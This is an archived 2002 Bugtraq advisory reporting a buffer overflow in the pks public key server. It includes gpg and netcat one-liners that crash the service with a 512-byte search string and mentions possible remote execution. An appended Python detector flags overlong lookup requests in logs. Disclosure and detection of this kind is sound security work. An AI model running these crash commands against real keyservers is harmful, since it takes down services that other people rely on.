Bugtraq mailing list archives

pks public key server DOS and remote execution


From: Max <rusmir () tula net>
Date: Fri, 24 May 2002 15:39:06 -0700 (PDT)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi there,

A popular pks public key server available from
http://www.mit.edu/people/marc/pks/pks.html
is vulnerable to buffer overflow attack.

A long enough (> 256b) search request will crash the service.

It is as simple as this:

gpg --search-keys `perl -e "print 'A'x512"`

or, without gpg,

echo -e "GET /pks/lookup?op=index&search=`perl -e "print 'A'x512"`"| nc keyserver-host 11371

Fortunately (or unfortunately) in order to exploit remote execution, the
code should be an isalnum() string and should be able to survive tolower()
conversion. But it is possible to write, especially for systems with
locales, where 0x80..0xff are printable characters.

Thanks,
Max.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)

iD8DBQE87sEN8mCpXsrcXpwRAiBoAJ9UjT7+XPoBJ0COO/W5gIHHFYmOygCgm80Y
oIAccr98kivYr2KsuF4SFzg=
=9quB
-----END PGP SIGNATURE-----
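Added example, not part of the original post: a small detector that flags HKP lookup requests whose decoded "search" parameter exceeds the 256-byte limit the advisory cites, so a defender can spot the crash pattern in request logs. The request lines are constructed for the example, and the length is measured after percent-decoding (what the server would see), which is an assumption about how such a check should be done.

```python
"""Flag /pks/lookup requests with an overlong 'search' parameter.
Added example for the advisory above; sample request lines are constructed."""
from typing import Iterable, Iterator, Optional, Tuple
from urllib.parse import urlsplit, parse_qsl

# Threshold from the advisory: search values longer than 256 bytes crashed pks.
MAX_SEARCH_LEN = 256


def search_param_length(request_line: str) -> Optional[int]:
    """Return the decoded byte length of the 'search' query parameter of an
    HKP request line such as 'GET /pks/lookup?op=index&search=foo HTTP/1.0',
    or None if the line is not a /pks/lookup GET or carries no 'search'."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0].upper() != "GET":
        return None
    url = urlsplit(parts[1])
    if url.path != "/pks/lookup":
        return None
    # keep_blank_values so 'search=' with an empty value is still reported
    params = dict(parse_qsl(url.query, keep_blank_values=True))
    if "search" not in params:
        return None
    return len(params["search"].encode("utf-8"))


def overlong_requests(lines: Iterable[str],
                      limit: int = MAX_SEARCH_LEN) -> Iterator[Tuple[int, int]]:
    """Yield (line_no, length) for lines whose search value exceeds limit."""
    for line_no, line in enumerate(lines, start=1):
        n = search_param_length(line)
        if n is not None and n > limit:
            yield line_no, n


# Constructed sample traffic: a normal key fetch, an index request carrying a
# 512-byte value like the advisory's test, and an unrelated request.
SAMPLE_REQUESTS = [
    "GET /pks/lookup?op=get&search=0xDEADBEEF HTTP/1.0",
    "GET /pks/lookup?op=index&search=" + "A" * 512 + " HTTP/1.0",
    "GET /pks/add HTTP/1.0",
]

if __name__ == "__main__":
    for line_no, n in overlong_requests(SAMPLE_REQUESTS):
        print(f"line {line_no}: search parameter is {n} bytes (> {MAX_SEARCH_LEN})")
```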

